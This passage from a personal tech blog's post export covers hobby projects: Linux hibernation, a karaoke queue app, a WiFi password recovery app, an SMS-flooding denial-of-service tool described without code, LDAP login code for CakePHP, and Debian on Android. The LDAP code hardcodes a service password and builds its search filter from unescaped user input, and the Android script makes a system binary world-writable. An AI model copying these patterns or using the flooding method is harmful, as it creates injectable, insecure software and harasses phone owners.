However most modern computers will support it.\u003c/p\u003e\n\u003cp\u003eTo add a hibernation option just download \u003ca href=\"https://gist.github.com/lanrat/5650237\"\u003ethis\u003c/a\u003e file and place it in the bin directory of your home folder: \u0026ldquo;~/bin/\u0026rdquo; and make it executable with:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-shell\" data-lang=\"shell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003echmod +x cb-exit\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003ca href=\"https://gist.github.com/lanrat/5650237\"\u003ecb-exit Gist\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eIf you want to test your system to see if it can handle hibernation run the following command. If your system supports it you should be able to successfully enter and exit hibernation:\u003c/p\u003e","title":"Adding Hibernate to the CrunchBang Linux shutdown menu"},{"content":"\nA while ago I decided that I needed some more JavaScript/AJAX experience, and what better way to get it than to use it to solve an existing problem.\nEvery now and then my apartment hosts karaoke nights, we have a lot of songs, enough to fill a 4-inch binder. Searching for songs was a pain. In order to find the song\u0026rsquo;s ID code to give to the DJ you must search through pages of songs and artists that were in no particular order. I decided to fix this problem with my skill set, so I created DJQueue. DJQueue is a collection of hacked together PHP, JavaScript, and SQL magic.\nSince most party attendees have a smartphone, the interface is entirely mobile. Users can choose their own alias, which often is not their real name; especially if they are … not so good. 
From there on, searching and enqueueing songs stored in the database is all AJAX. As guests search the song list and select songs they want, they are added to the current queue and the new song appears on a separate interface for the DJ.\nAll code is open source and freely available on GitHub!\n","permalink":"https://lanrat.com/posts/dj-queue/","summary":"\u003cp\u003e\u003cimg alt=\"queue_screenshot\" loading=\"lazy\" src=\"/posts/dj-queue/images/karaoke-queue-screenshot.webp\"\u003e\u003c/p\u003e\n\u003cp\u003eA while ago I decided that I needed some more JavaScript/AJAX experience, and what better way to get it than to use it to solve an existing problem.\u003c/p\u003e\n\u003cp\u003eEvery now and then my apartment hosts karaoke nights; we have a lot of songs, enough to fill a 4-inch binder. Searching for songs was a pain. In order to find the song\u0026rsquo;s ID code to give to the DJ you must search through pages of songs and artists that were in no particular order. I decided to fix this problem with my skill set, so I created \u003ca href=\"https://github.com/lanrat/DJ_Queue\"\u003eDJQueue\u003c/a\u003e. \u003ca href=\"https://github.com/lanrat/DJ_Queue\"\u003eDJQueue\u003c/a\u003e is a collection of hacked-together PHP, JavaScript, and SQL magic.\u003c/p\u003e","title":"PHP Karaoke Queue"},{"content":"WiFi Recovery is an Android application that retrieves saved WiFi passwords from the device\u0026rsquo;s system files. The app requires root access to read the wpa_supplicant.conf file where Android stores network credentials in plain text format.\nThe application uses libraries including ActionBarSherlock, ZXING for QR code generation, and RootTools for system-level file access. It provides a simple interface to view saved network passwords and can generate QR codes for easy network sharing.
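For illustration, the wpa_supplicant.conf format mentioned above is a simple block syntax: network={ ... } stanzas containing key=value lines. A minimal parser sketch (the sample data is invented and this is not the app's actual code; real files have more fields and quoting rules):

```python
import re

def parse_networks(conf_text):
    """Extract the fields of each network={...} block as a dict."""
    networks = []
    for block in re.findall(r"network=\{(.*?)\}", conf_text, re.DOTALL):
        entry = {}
        for line in block.splitlines():
            line = line.strip()
            if "=" in line:
                key, _, value = line.partition("=")
                entry[key.strip()] = value.strip().strip('"')
        networks.append(entry)
    return networks

sample = '''
network={
    ssid="HomeWiFi"
    psk="hunter2"
    key_mgmt=WPA-PSK
}
'''
print(parse_networks(sample))
# [{'ssid': 'HomeWiFi', 'psk': 'hunter2', 'key_mgmt': 'WPA-PSK'}]
```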
The project has been archived as modern Android versions have changed WiFi credential storage mechanisms.\n","permalink":"https://lanrat.com/projects/wifi-recovery/","summary":"\u003cp\u003eWiFi Recovery is an Android application that retrieves saved WiFi passwords from the device\u0026rsquo;s system files. The app requires root access to read the wpa_supplicant.conf file where Android stores network credentials in plain text format.\u003c/p\u003e\n\u003cp\u003eThe application uses libraries including ActionBarSherlock, ZXING for QR code generation, and RootTools for system-level file access. It provides a simple interface to view saved network passwords and can generate QR codes for easy network sharing. The project has been archived as modern Android versions have changed WiFi credential storage mechanisms.\u003c/p\u003e","title":"WiFi Recovery"},{"content":"\nA while ago I wondered how well modern cellphones could handle a flood of text messages. So I created a simple python program to test just that. The program works by sending emails to an SMS Gateway, which will forward the message to the phone in the form of a text message.\nI tested my program on two devices, my modern HTC Incredible running Android and my aging LG Chocolate dumb-phone. The results were surprising! After starting the program, my HTC Incredible froze after receiving the first 20 messages. A battery pull was required to get it to respond. The second it finished booting it froze again! I was only able to make it respond by stopping my program and rebooting the phone. After it booted, it froze again while catching up on all the messages that were sent.\nMy LG Chocolate was another story. While it never froze, it did make the phone almost impossible to use. 10 times a second it would display a notification of the new message. But after about 100 messages it just stopped. My program was still sending them, but the phone stopped receiving them.
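The email-to-SMS mechanism described above can be sketched with Python's standard smtplib and email modules. This is not the original program, and the gateway domain and SMTP server below are placeholders; each carrier publishes its own gateway address:

```python
import smtplib
from email.message import EmailMessage

def build_sms_message(number, gateway_domain, body, sender):
    """Build the email that the carrier's gateway will deliver as a text."""
    msg = EmailMessage()
    # e.g. 5551234567@sms.example-carrier.com (gateway domain is carrier-specific)
    msg["To"] = f"{number}@{gateway_domain}"
    msg["From"] = sender
    msg.set_content(body)
    return msg

def send_sms(msg, smtp_host, smtp_port=587, user=None, password=None):
    """Hand the message to an SMTP server; the gateway does the rest."""
    with smtplib.SMTP(smtp_host, smtp_port) as smtp:
        smtp.starttls()
        if user and password:
            smtp.login(user, password)
        smtp.send_message(msg)

# A flood is then just a loop (only against a phone you own!):
# for i in range(100):
#     send_sms(build_sms_message("5551234567", "sms.example-carrier.com",
#                                f"message {i}", "me@example.com"),
#              "smtp.example.com", user="me@example.com", password="...")
```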
I\u0026rsquo;m not sure if this was done by the phone itself or something on the carrier\u0026rsquo;s end.\nI am releasing the source of this program in case others find it interesting. I claim no responsibility for any damage done by this program. Use at your own risk on devices you own!\nSource Code at GitHub\nSMS DOS requires PyQt4 for the GUI; it can be installed from Riverbank Computing.\n","permalink":"https://lanrat.com/posts/sms-dos/","summary":"\u003cp\u003e\u003cimg alt=\"SMS DOS Screenshot\" loading=\"lazy\" src=\"/posts/sms-dos/images/SMSDOS_Screenshot.webp\"\u003e\u003c/p\u003e\n\u003cp\u003eA while ago I wondered how well modern cellphones could handle a flood of text messages. So I created a simple python program to test just that. The program works by sending emails to an \u003ca href=\"https://en.wikipedia.org/wiki/SMS_gateway\"\u003eSMS Gateway\u003c/a\u003e which will forward the message to the phone in the form of a text message.\u003c/p\u003e\n\u003cp\u003eI tested my program on two devices, my modern HTC Incredible running Android and my aging LG Chocolate dumb-phone. The results were surprising! After starting the program, my HTC Incredible froze after receiving the first 20 messages. A battery pull was required to get it to respond. The second it finished booting it froze again! I was only able to make it respond by stopping my program and rebooting the phone.
After it booted, it froze again while catching up on all the messages that were sent.\u003c/p\u003e","title":"SMS DOS: Cellphone Denial Of Service via text messages"},{"content":"\nHave you ever wanted to give a friend access to a wireless network you are on but don\u0026rsquo;t want to go find the key?\nWIFI Key Recovery will find the key on your device and allow you to share it via a message or QR Code.\nAdditionally WIFI Key Recovery will allow you to back up/restore your current WIFI configuration to your SD card!\nIf this app does not work on your rooted phone, email me and I will try to add support.\nAll application code is open source and available on GitHub!\n","permalink":"https://lanrat.com/posts/wifi-recovery-for-android/","summary":"\u003cp\u003e\u003cimg alt=\"WiFi Recovery\" loading=\"lazy\" src=\"/posts/wifi-recovery-for-android/images/wifirecovery.webp\"\u003e\u003c/p\u003e\n\u003cp\u003eHave you ever wanted to give a friend access to a wireless network you are on but don\u0026rsquo;t want to go find the key?\u003c/p\u003e\n\u003cp\u003eWIFI Key Recovery will find the key on your device and allow you to share it via a message or QR Code.\u003cbr\u003e\nAdditionally WIFI Key Recovery will allow you to back up/restore your current WIFI configuration to your SD card!\u003c/p\u003e\n\u003cp\u003eIf this app does not work on your rooted phone, email me and I will try to add support.\u003c/p\u003e","title":"WIFI Recovery for Android"},{"content":"DNS.coffee is a web platform that collects and archives DNS zone file statistics to provide insights into DNS growth and changes over time. The service tracks domain distribution across zones, TLD root zone growth patterns, and overall internet domain expansion through comprehensive data visualization.\nThe platform includes tools for domain record searches, nameserver lookups, IP information queries, and advanced search capabilities.
DNS.coffee also provides an API for programmatic access to DNS data, making it a valuable resource for researchers and network administrators analyzing DNS infrastructure trends and domain name system evolution.\n","permalink":"https://lanrat.com/projects/dns.coffee/","summary":"\u003cp\u003eDNS.coffee is a web platform that collects and archives DNS zone file statistics to provide insights into DNS growth and changes over time. The service tracks domain distribution across zones, TLD root zone growth patterns, and overall internet domain expansion through comprehensive data visualization.\u003c/p\u003e\n\u003cp\u003eThe platform includes tools for domain record searches, nameserver lookups, IP information queries, and advanced search capabilities. DNS.coffee also provides an API for programmatic access to DNS data, making it a valuable resource for researchers and network administrators analyzing DNS infrastructure trends and domain name system evolution.\u003c/p\u003e","title":"DNS.coffee"},{"content":"This article is going to help you use LDAP to authenticate users rather than relying on a users table with a password column. I will assume you are using CakePHP 1.3 and that you have completed Auth and/or ACL setup on your application similar to the ACL tutorial in the CakePHP book.\nBecause we want to control the logging in of the user ourselves and not leave it to the cake magic, we need to override the auth component. To do this copy your auth.php from your CAKE_CORE/controllers/components/ to your APP/controllers/components/ folder. Next open it up and find the login function. It should be around line 684. Once you find it, comment out everything inside the function, but leave the function intact.
It should look something like this:\nfunction login($data = null) { /*$this-\u0026gt;__setDefaults(); $this-\u0026gt;_loggedIn = false; if (empty($data)) {$data = $this-\u0026gt;data; } if ($user = $this-\u0026gt;identify($data)) { $this-\u0026gt;Session-\u0026gt;write($this-\u0026gt;sessionKey, $user); $this-\u0026gt;_loggedIn = true; } return $this-\u0026gt;_loggedIn;*/ } Next open up your users controller and find your login function. Assuming you followed the guide or have implemented some basic auth you should have an empty login function.\nI have written an LDAP helper that can easily be included as a LIB for CakePHP that will get some user data and validate the login; copy and paste it from below to APP/libs/ldap.php\n\u0026lt;?php class ldap{ private $ldap = null; private $ldapServer = \u0026#39;AD.domain.com\u0026#39;; private $ldapPort = \u0026#39;389\u0026#39;; public $suffix = \u0026#39;@domain.com\u0026#39;; public $baseDN = \u0026#39;dc=domain,dc=com\u0026#39;; private $ldapUser = \u0026#39;LDAPUser\u0026#39;; private $ldapPassword = \u0026#39;Pas5w0rd\u0026#39;; public function __construct() { $this-\u0026gt;ldap = ldap_connect($this-\u0026gt;ldapServer,$this-\u0026gt;ldapPort); //these next two lines are required for windows server 03 ldap_set_option($this-\u0026gt;ldap, LDAP_OPT_REFERRALS, 0); ldap_set_option($this-\u0026gt;ldap, LDAP_OPT_PROTOCOL_VERSION, 3); } public function auth($user,$pass) { if (empty($user) or empty($pass)) { return false; } @$good = ldap_bind($this-\u0026gt;ldap,$user.$this-\u0026gt;suffix,$pass); if( $good === true ){ return true; }else{ return false; } } public function __destruct(){ ldap_unbind($this-\u0026gt;ldap); } public function getInfo($user){ $username = $user.$this-\u0026gt;suffix; $attributes = array(\u0026#39;givenName\u0026#39;,\u0026#39;sn\u0026#39;,\u0026#39;mail\u0026#39;,\u0026#39;samaccountname\u0026#39;,\u0026#39;memberof\u0026#39;); $filter = \u0026#34;(userPrincipalName=$username)\u0026#34;;
ldap_bind($this-\u0026gt;ldap,$this-\u0026gt;ldapUser.$this-\u0026gt;suffix,$this-\u0026gt;ldapPassword); $result = ldap_search($this-\u0026gt;ldap, $this-\u0026gt;baseDN, $filter,$attributes); $entries = ldap_get_entries($this-\u0026gt;ldap, $result); return $this-\u0026gt;formatInfo($entries); } private function formatInfo($array){ $info = array(); $info[\u0026#39;first_name\u0026#39;] = $array[0][\u0026#39;givenname\u0026#39;][0]; $info[\u0026#39;last_name\u0026#39;] = $array[0][\u0026#39;sn\u0026#39;][0]; $info[\u0026#39;name\u0026#39;] = $info[\u0026#39;first_name\u0026#39;] .\u0026#39; \u0026#39;. $info[\u0026#39;last_name\u0026#39;]; $info[\u0026#39;email\u0026#39;] = $array[0][\u0026#39;mail\u0026#39;][0]; $info[\u0026#39;user\u0026#39;] = $array[0][\u0026#39;samaccountname\u0026#39;][0]; $info[\u0026#39;groups\u0026#39;] = $this-\u0026gt;groups($array[0][\u0026#39;memberof\u0026#39;]); return $info; } private function groups($array) { $groups = array(); $tmp = array(); foreach( $array as $entry ) { $tmp = array_merge($tmp,explode(\u0026#39;,\u0026#39;,$entry)); } foreach($tmp as $value) { if( substr($value,0,2) == \u0026#39;CN\u0026#39; ){ $groups[] = substr($value,3); } } return $groups; } } ?\u0026gt; Edit the variables at the top of the file to reflect your setup.\nNow we are going to make our Users-\u0026gt;login function check the POST username and password against LDAP, and then if valid it will perform the login magic that auth used to do.\nFill your login function with this:\nfunction login() { App::import(\u0026#39;Lib\u0026#39;, \u0026#39;ldap\u0026#39;); if ($this-\u0026gt;Session-\u0026gt;read(\u0026#39;Auth.User\u0026#39;)) { $this-\u0026gt;redirect(array(\u0026#39;controller\u0026#39; =\u0026gt; \u0026#39;allocations\u0026#39;, \u0026#39;action\u0026#39; =\u0026gt; \u0026#39;index\u0026#39;)); } elseif (!empty($this-\u0026gt;data)) { $ldap = new ldap; if
($ldap-\u0026gt;auth($this-\u0026gt;Auth-\u0026gt;data[\u0026#39;User\u0026#39;][\u0026#39;user\u0026#39;], $this-\u0026gt;Auth-\u0026gt;data[\u0026#39;User\u0026#39;][\u0026#39;password\u0026#39;])) { $userrow = $this-\u0026gt;User-\u0026gt;findByUsername($this-\u0026gt;data[\u0026#39;User\u0026#39;][\u0026#39;user\u0026#39;]); if (!$userrow) { $ldap_info = $ldap-\u0026gt;getInfo($this-\u0026gt;data[\u0026#39;User\u0026#39;][\u0026#39;user\u0026#39;]); $this-\u0026gt;data[\u0026#39;User\u0026#39;][\u0026#39;username\u0026#39;] = $this-\u0026gt;data[\u0026#39;User\u0026#39;][\u0026#39;user\u0026#39;]; $this-\u0026gt;data[\u0026#39;User\u0026#39;][\u0026#39;name\u0026#39;] = $ldap_info[\u0026#39;name\u0026#39;]; $this-\u0026gt;data[\u0026#39;User\u0026#39;][\u0026#39;group_id\u0026#39;] = 3; //sets the default group $this-\u0026gt;add(); $userrow = $this-\u0026gt;User-\u0026gt;findByUsername($this-\u0026gt;data[\u0026#39;User\u0026#39;][\u0026#39;user\u0026#39;]); } $user = $userrow[\u0026#39;User\u0026#39;]; $this-\u0026gt;Auth-\u0026gt;Session-\u0026gt;write($this-\u0026gt;Auth-\u0026gt;sessionKey, $user); $this-\u0026gt;Auth-\u0026gt;_loggedIn = true; $this-\u0026gt;Session-\u0026gt;setFlash(\u0026#39;You are logged in!\u0026#39;); $this-\u0026gt;redirect(array(\u0026#39;controller\u0026#39; =\u0026gt; \u0026#39;allocations\u0026#39;, \u0026#39;action\u0026#39; =\u0026gt; \u0026#39;index\u0026#39;)); } else { $this-\u0026gt;Session-\u0026gt;setFlash(__(\u0026#39;Login Failed\u0026#39;, true)); } } } To quickly summarize: it first checks whether the user is already logged in; if not, and POST data is provided, it checks the provided credentials with the LDAP lib. If the credentials are valid it then attempts to get the user from the users table; if the user does not exist, it creates one with the information provided from LDAP and the defaults set in the function.\nI built this to still work with a users table to allow relationships between other models and users.
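Stripped of the CakePHP specifics, the control flow of this login function is: bind to LDAP as the user, and on the first successful login auto-provision a local user row. The Python sketch below is illustrative only: ldap_bind is a stub standing in for a real directory bind, a dict stands in for the users table, and the suffix and default group id simply mirror the PHP above.

```python
SUFFIX = "@domain.com"   # mirrors $suffix in the PHP lib above
DEFAULT_GROUP_ID = 3     # default group for auto-created users

def ldap_bind(principal, password):
    """Stub: a real implementation would bind to the directory server."""
    return password == "Pas5w0rd"  # placeholder check, for illustration only

users = {}  # stands in for the users table

def login(user, password):
    """Return the user row on success, None on failure."""
    if not user or not password:
        return None
    if not ldap_bind(user + SUFFIX, password):
        return None  # "Login Failed"
    row = users.get(user)
    if row is None:
        # First login: create the row (real code also pulls name/email from LDAP)
        row = {"username": user, "group_id": DEFAULT_GROUP_ID}
        users[user] = row
    return row  # the caller writes this to the session
```

The key property, as in the PHP version, is that the password is never stored locally; only the directory ever sees it.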
However, it can be used without a users table; just remove the if(!$userrow) statement and the line before it.\nNote If you use a users table, you do not need, and should not have, a password column.\nThat should be it! You should now be using LDAP for user credential validation.\n","permalink":"https://lanrat.com/posts/ldap-authentication-for-cakephp/","summary":"\u003cp\u003eThis article is going to help you use LDAP to authenticate users rather than relying on a users table with a password column. I will assume you are using CakePHP 1.3 and that you have completed Auth and/or ACL setup on your application similar to the \u003ca href=\"https://book.cakephp.org/view/1543/Simple-Acl-controlled-Application\"\u003eACL tutorial in the CakePHP book\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eBecause we want to control the logging in of the user ourselves and not leave it to the cake magic, we need to override the auth component. To do this copy your auth.php from your \u003ccode\u003eCAKE_CORE/controllers/components/\u003c/code\u003e to your \u003ccode\u003eAPP/controllers/components/\u003c/code\u003e folder. Next open it up and find the login function. It should be around line 684. Once you find it, comment out everything inside the function, but leave the function intact. It should look something like this:\u003c/p\u003e","title":"LDAP Authentication for Cakephp"},{"content":"Backstory A few years ago when the local Circuit City was going out of business I decided to stop by to see if there were any good deals. Unfortunately most of their inventory was only slightly discounted (if at all). However they were getting rid of some of their CRM and sales equipment. I picked up a 3M touch-panel LCD monitor for $20 or so, sold \u0026ldquo;as-is\u0026rdquo;. When I got home I realized that the LCD panel was only 800x600px, and had a broken back-light.
I tried to get the touch panel working but for some reason it was not receiving power and I could not find any drivers for it. Into storage it went.\nA few months later I dusted it off and decided to give it another try. I was able to find a way of providing 5V power to the controller board for the touch panel, and after much searching I found the drivers.\nThe Hardware Once I got the driver, power to the board, and figured out its serial connection it was surprisingly easy to get working. Below you can see a picture and video of the touch panel wired up and working on a laptop.\nThe next step was to remove the glass touch panel from the broken LCD. The glass was only held on by some very strong adhesive. After carefully removing it I tested it to make sure everything was still in good working order.\nNow is when the fun starts! I picked up a picture frame that used a piece of glass the exact same size as the touch panel from a local arts and crafts store. I also found an old Pentium M laptop I would be modifying to use the touch panel on its screen with the picture frame.\nBelow you can see the touch panel in the picture-frame, and the laptop I would be using for this project with its screen removed and the touch-panel attached by its side.\nI gutted the laptop of unneeded parts, such as the keyboard, mouse, DVD drive, and lots of other plastic bits that would be in the way or covered up. Then I reattached its screen backwards, so that when it folds down it faces up.\nI mounted the touch panel\u0026rsquo;s controller board where the DVD drive once was, and gave it 5V of power from the laptop\u0026rsquo;s USB ports. Below you can see the picture-frame resting on the laptop but not attached yet, and the wiring for the touch-panel.\nNow for the inside wiring!\nAs you can see I used hot glue to hold the controller board in the optical drive bay. And all the wiring was looking good.
I just needed a way to mount the touch-panel/picture frame to the rest of the laptop.\nAnd here was my solution:\nI would use these bent metal brackets I picked up at Home Depot to secure them together.\nAt this point everything was working great. I should probably mention what those blue wires are that you can see sticking out of it. They lead to the laptop\u0026rsquo;s power and standby buttons. Those buttons would normally be located right above the keyboard, however with this mod they are no longer accessible, so they will be relocated.\nI mounted the power and standby buttons (seen above) on a piece of plastic from the LCD assembly. I placed it over the hole in the laptop where the outside of the DVD drive was.\nThis concludes the hardware portion of this mod.\nThe Software To make the interface more touch friendly I installed RocketDock to make launching applications nicer.\nAlso since there is no longer a keyboard I used the Touch-It Virtual Keyboard to replace key input. I like this keyboard because it can hide easily and not take up any screen real estate when you don\u0026rsquo;t need it.\nIf anyone reading this needs the driver for their 3M MT7 touch panel, or if I ever need the link for the driver, here is that too: https://solutions.3m.com/wps/portal/3M/en_US/TouchSystems/TouchScreen/CustomerSupport/TouchScreenDrivers/\nIn addition to the utilities above, I also installed XBMC, which acts as perfect picture-display software, and with UPnP/DLNA I can control it from my phone, and even wirelessly display photos from my phone on it via my network.\n","permalink":"https://lanrat.com/posts/picture-frame-tablet-pc/","summary":"\u003ch2 id=\"backstory\"\u003eBackstory\u003c/h2\u003e\n\u003cp\u003eA few years ago when the local Circuit City was going out of business I decided to stop by to see if there were any good deals. Unfortunately most of their inventory was only slightly discounted (if at all). However they were getting rid of some of their CRM and sales equipment.
I picked up a 3M touch-panel LCD monitor for $20 or so, sold \u0026ldquo;as-is\u0026rdquo;. When I got home I realized that the LCD panel was only 800x600px, and had a broken back-light. I tried to get the touch panel working but for some reason it was not receiving power and I could not find any drivers for it. Into storage it went.\u003c/p\u003e","title":"Picture Frame Tablet PC"},{"content":"This is about a piece of software I wrote over a year ago to fit a need I had at the time. It probably will not receive any updates, but I have released the source, and anyone is free to do as they please with it.\nBackground PHPRepo is a PHP CMS for managing Debian package repositories. A while ago I wanted to start my own repository for some of my own packages, so I looked for an easy way to do this. I found none. At the time the only way to run and manage a Debian package repository was through apt at the command line, and since at the time I was learning PHP I decided to write my own software to fill this void. Thus I created PHPRepo. PHPRepo has very minimal requirements and can work alongside an existing repository that is managed with apt.\nInstallation Installation is as easy as it gets for a PHP app. There are no databases to configure, as it uses the Debian repository files as its database. Simply upload the phprepo files to the root of your web-server and edit the config file with a user name and password you wish to use.\nAlso, if you want the ability to manage the repository in addition to viewing it in your web browser then make sure the user on your server that the web-server is running under has read and write permission to the repository files.\nScreenshot Tour My screenshots are for a repository that already has a few packages in it. If you are making a repository from scratch you will not be able to see as much.\nAbove is the main screen.
You can see a tree list structure of all of your repositories, components, and architectures.\nAbove you can see the list of all repositories on the system.\nClicking on a repository brings you to the repository page, shown above. It will list all of the packages in the repository.\nOne very nice feature is the ability to search from a web browser.\nIf you choose to use PHPRepo to manage your repository, the above screen will allow you to add/upload packages to your repository. Simply select the file, distribution, and component. If the distribution or component that you want does not exist you can create it. All details about the package such as name, arch, etc. are read from the deb file upon upload. It\u0026rsquo;s like magic!\nIf you click on a package you will be taken to the screen above. This page lets you view the details of the package. You can also manually download the deb file, or a Maemo .install file. You can also manage the file by deleting its entry in the repository or by deleting the entry and removing the actual file from the server.\nIf you choose to delete a file you will see the above screen asking if you are sure.\nThe above screen is for deleting an entire repository, and all packages associated with it.\nConclusion As stated before, I made this program over a year ago to fill a void. And I was rather surprised that nothing like this already existed. In any case the program and its source code can be downloaded from its project hosted at Google Code.\nPHPRepo at Google Code\n","permalink":"https://lanrat.com/posts/phprepo/","summary":"\u003cp\u003eThis is about a piece of software I wrote over a year ago to fit a need I had at the time. It probably will not receive any updates, but I have released the source, and anyone is free to do as they please with it.\u003c/p\u003e\n\u003ch2 id=\"background\"\u003eBackground\u003c/h2\u003e\n\u003cp\u003ePHPRepo is a PHP CMS for managing Debian package repositories.
A while ago I wanted to start my own repository for some of my own packages, so I looked for an easy way to do this. I found none. At the time the only way to run and manage a Debian package repository was through apt at the command line, and since at the time I was learning PHP I decided to write my own software to fill this void. Thus I created PHPRepo. PHPRepo has very minimal requirements and can work alongside an existing repository that is managed with apt.\u003c/p\u003e","title":"PHPRepo"},{"content":"This is a minimalistic how-to to get a Debian environment running on almost any (rooted) Android phone. I adapted the method here: https://www.saurik.com/id/10 to be more universal and added some new features.\nPreparing the Debian Image You will need access to a computer running a Debian-based distribution to create the image for your phone. I used Ubuntu 10.04. To create the image you need to install a program called debootstrap. debootstrap will allow you to create a mini Debian install in your image.\nAfter installing debootstrap you will need to create a filesystem image for Android to use and for debootstrap to install Debian to. You can use the dd command to create the image. In my example below I made an 800MB image. Once the image is made, you need to format it to a Linux file system.\nOnce your image is formatted you should mount it and then run debootstrap.\nBelow are my example commands; you may want or need to change them to fit your environment, such as the Debian mirror, file size, etc.\nsudo -s apt-get install debootstrap dd if=/dev/zero of=debian.img seek=838860800 bs=1 count=1 mke2fs -F debian.img mkdir debian mount -o loop debian.img debian/ debootstrap --verbose --arch armel --foreign lenny debian http://ftp.us.debian.org/debian umount debian/ rm -r debian/ Preparing the Debian boot script Below is my Debian boot script (named bootdebian). I based it on the Ubuntu boot script for the HTC Droid Incredible, but modified it.
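As an aside on the dd command in the image-creation step above: seeking 800 MB into an empty file and writing a single byte creates a sparse file, so the allocation is near-instant and uses almost no disk until debootstrap fills it in. A hedged Python sketch of just that allocation step (the filename matches the shell commands above; formatting and debootstrap still happen in the shell):

```python
import os

IMG = "debian.img"
SIZE = 800 * 1024 * 1024  # 800 MB, matching seek=838860800 in the dd command

# Create an empty file, then extend it to SIZE without writing data blocks.
# On most filesystems this stays sparse until blocks are actually written.
with open(IMG, "wb"):
    pass
os.truncate(IMG, SIZE)

print(os.path.getsize(IMG))  # 838860800
```

The dd idiom ends up one byte larger (it writes a byte at the seek offset); either way, mke2fs sees an 800 MB device-sized file.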
My script includes the ability to become root if you are not already root, and it will mount your Incredible\u0026rsquo;s SD card and internal memory inside Debian so that you can easily move files in and out of your chrooted environment. I also fixed some small errors on the other script. If you are not using the HTC Incredible you will want to change lines 38-47 to reflect your phone\u0026rsquo;s memory mount points.\nEDIT 10/18/10 Not everybody\u0026rsquo;s phone will use /dev/block/mtdblock3 for the /system mount point. Type the mount command to see what the proper mount point is on your device. The one used in this guide is for the HTC Incredible.\nif [[ $EUID -ne 0 ]] then echo \u0026#34;Becoming ROOT!\u0026#34; su -c bootdebian exit 1 fi echo \u0026#34;Mounting system as R/W\u0026#34; mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /system echo \u0026#34;Setting some stuff up..\u0026#34; export bin=/system/bin export img=/mnt/sdcard/debian.img export mnt=/data/local/debian export PATH=$bin:/usr/bin:/usr/sbin:/bin:$PATH export TERM=linux export HOME=/root if [ ! -d $mnt ] then mkdir $mnt fi echo \u0026#34;Mounting the Linux Image\u0026#34; mknod /dev/block/loop5 b 7 0 #may already exist losetup /dev/block/loop5 $img mount -t ext2 -o noatime,nodiratime /dev/block/loop5 $mnt mount -t devpts devpts $mnt/dev/pts mount -t proc proc $mnt/proc mount -t sysfs sysfs $mnt/sys echo \u0026#34;Setting Up Networking\u0026#34; sysctl -w net.ipv4.ip_forward=1 echo \u0026#34;nameserver 8.8.8.8\u0026#34; \u0026gt; $mnt/etc/resolv.conf echo \u0026#34;nameserver 8.8.4.4\u0026#34; \u0026gt;\u0026gt; $mnt/etc/resolv.conf echo \u0026#34;127.0.0.1 localhost\u0026#34; \u0026gt; $mnt/etc/hosts echo \u0026#34;Mounting sdcard and emmc in /mnt\u0026#34; if [ ! -d $mnt/mnt/emmc ] then mkdir $mnt/mnt/emmc fi busybox mount --bind /mnt/emmc/ $mnt/mnt/emmc if [ ! 
-d $mnt/mnt/sdcard ] then mkdir $mnt/mnt/sdcard fi busybox mount --bind /mnt/sdcard/ $mnt/mnt/sdcard echo \u0026#34;Entering CHROOT \u0026#34; echo \u0026#34; \u0026#34; chroot $mnt /bin/bash echo \u0026#34; \u0026#34; echo \u0026#34;Shutting down CHROOT\u0026#34; umount $mnt/mnt/emmc umount $mnt/mnt/sdcard sysctl -w net.ipv4.ip_forward=0 umount $mnt/dev/pts umount $mnt/proc umount $mnt/sys umount $mnt losetup -d /dev/block/loop5 mount -o remount,ro -t yaffs2 /dev/block/mtdblock3 /system Now move both the above script and the debian.img file you made to your phone\u0026rsquo;s memory card.\nFinishing up the Image Now we need to finish up the install on your phone. Open the terminal app you plan to use on your phone; I recommend ConnectBot. First we will re-mount the system partition as Read/Write, then move our bootdebian script over, make it executable, then remove it from the SD card. Then we run the bootdebian script and run the second stage of debootstrap. The second stage of debootstrap will take a while; it took me 15 minutes. Let it run. Once debootstrap has finished we will add the official Debian repository into the system, then use apt-get to remove the files left over by debootstrap. Here are the commands:\nsu mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /system cat /sdcard/bootdebian \u0026gt; /system/xbin/bootdebian rm /sdcard/bootdebian chmod 777 /system/xbin/bootdebian bootdebian /debootstrap/debootstrap --second-stage echo \u0026#39;deb http://ftp.us.debian.org/debian lenny main\u0026#39; \u0026gt; /etc/apt/sources.list apt-get autoclean apt-get update exit You are done Now you can run bootdebian anytime from your phone\u0026rsquo;s terminal to enter a full Debian system. You can apt-get install any Debian package that has been compiled for armel. 🙂\nIf you want to go further you can install X, and a VNC server.
This would allow you to VNC into the Debian system from your phone, giving you a full X environment.\nNow go enjoy your full Linux distribution on your phone!\n","permalink":"https://lanrat.com/posts/install-debian-on-android/","summary":"\u003cp\u003eThis is a minimalistic how-to to get a Debian environment running on almost any (rooted) Android phone. I adapted the method here: \u003ca href=\"https://www.saurik.com/id/10\"\u003ehttps://www.saurik.com/id/10\u003c/a\u003e to be more universal and added some new features.\u003c/p\u003e\n\u003ch2 id=\"preparing-the-debian-image\"\u003ePreparing the Debian Image\u003c/h2\u003e\n\u003cp\u003eYou will need access to a computer running a Debian-based distribution to create the image for your phone. I used Ubuntu 10.04. To create the image you need to install a program called debootstrap. debootstrap will allow you to create a mini Debian install in your image.\u003c/p\u003e","title":"Install Debian on Android"},{"content":"The official HTC Incredible 2.2 update added a new feature to the ROM. When the phone is connected to a computer via USB, even if the memory card is not mounted, it will act as a virtual CD-ROM. It basically just acts as a CD-ROM drive with the disk image found in /system/etc/CDROM.ISO. The default ISO was some annoying Verizon thing. Most (rooted) users simply deleted the ISO from their system. I however found a way to make this feature a bit more useful.\nEnabling and Disabling the CD-ROM the Right Way The first way most people disabled this was to delete the ISO. This is not the correct way of doing it. Just deleting the file will still have the phone show an empty CD-ROM drive when plugged in to a computer.
